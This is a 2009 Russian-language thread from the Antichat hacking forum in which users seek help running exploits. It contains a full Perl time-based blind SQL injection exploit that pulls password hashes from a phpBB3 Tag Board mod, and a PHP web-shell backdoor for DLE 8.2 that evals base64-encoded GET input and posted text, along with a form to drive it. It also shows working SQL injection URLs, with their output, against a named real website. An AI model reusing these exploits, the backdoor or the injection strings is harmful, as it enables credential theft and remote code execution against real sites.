Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.12.2009, 14:56
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Сообщение от 6oT
Ребята помогите плиз!Кароче у меня есть эксплоит на phpBB3 я его запуская а там где MD5 : пусто что делать? или это форум пропатчен?
Сплойт выложи
|
|
|
23.12.2009, 15:04
|
|
Новичок
Регистрация: 22.12.2009
Сообщений: 3
Провел на форуме:
30332
Репутация:
0
|
|
Код:
#!/Perl/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------
use strict;
use LWP::UserAgent;
my ($hash,$time1,$time2);
my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;
my $host = shift;
my $table = shift;
my $myid = shift or &usage;
sub injection
{
my ($sub,$char) = @_;
return "/tag_board.php?mode=controlpanel&action=delete&id=".
"1+and+(select+if((ascii(substring(user_password,${sub},1)".
")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
"ers+where+user_id=${myid})--";
}
sub usage
{
print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}
syswrite(STDOUT,'Hash MD5: ');
for my $i(1..33)
{
for my $j(0..16)
{
$time1 = time();
$http->get($host.injection($i,$chars[$j]));
$time2 = time();
if($time2 - $time1 > 6)
{
syswrite(STDOUT,chr($chars[$j]));
$hash .= chr($chars[$j]);
last;
}
if($i == 1 && length $hash < 0)
{
syswrite(STDOUT,"Exploit Failed!\n");
exit;
}
}
}
# milw0rm.com [2008-12-08]
Так же есть ещё и на php но там я незнаю как запустить !
А на perle оно думает потом выдаёт MD5 : и все!
Последний раз редактировалось 6oT; 23.12.2009 в 15:32..
|
|
|
|
23.12.2009, 16:46
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Есть сайт на DLE 8.2. Под эту версию двига нашёл эксплойт.
PHP код:
if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}
Только вот как его применить?
Пробовал создавал форуму.
PHP код:
<form method=post action="http://site.ru/engine/ajax/updates.php?wert=go" >
<input type=text name=text>
<input type=submit value=Отвправить></form>
Помогите пожалуйста разобраться  |
|
|
|
23.12.2009, 17:00
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
разбирался со скриптом от Пашкелы и Электа для работы с SQLinj, возник вопросс перловским скриптом Электа:
делая запрос: c:\mysql\public> c:\mysql\public\mssql_base_dump.pl -u "http://sait.com/section?php/section_id=20 ' " -w 3
после этого у меня тупо открывается текстовый файл mssql_base_dump, может кто сталкивался с такой проблемой?
|
|
|
|
23.12.2009, 17:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Код:
c:\mysql\public> c:\perl\bin\perl c:\mysql\public\mssql_base_dump.pl -u
|
|
|
|
23.12.2009, 22:14
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://pult.com.ua/tv.php?id=14558&world=0+and+2=1+union+select+1,2,3 ,4,5,6--
пробовал и с подзапросами и без...ошибка все равно остается...
|
|
|
|
23.12.2009, 22:41
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от jecka3000
пробовал и с подзапросами и без...ошибка все равно остается...
http://pult.com.ua/tv.php?id=14558&world=0+and+extractvalue(1,concat( 0x5c,(select+version())))--+
5.1.35-log
|
|
|
|
24.12.2009, 02:10
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Из за чего возникает ошибка:
Warning: include(Array) [function.include]: failed to open stream: No such file or directory in ../../../..
Запрос:
И как от неё избавиться? |
|
|
|
24.12.2009, 02:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от DeluxeS
Из за чего возникает ошибка:
Запрос:
И как от неё избавиться?
приемные данные не фильтруются. Скрипт, как я понял, передает открыть сразу массив файлов, что невозможно.
Либо просто убери ошибки, либо фильтруй. Разумеется, 2ое лучше.
|
|
|
|
24.12.2009, 12:48
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от DeluxeS
Из за чего возникает ошибка:
Запрос:
И как от неё избавиться?
Скрипт ждёт от тебя строку, а ты ему массив передаёшь.
Попробуй так: script.php?b=64.txt
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1777754){kind=avatar}
Похожие темы
Линейный вид
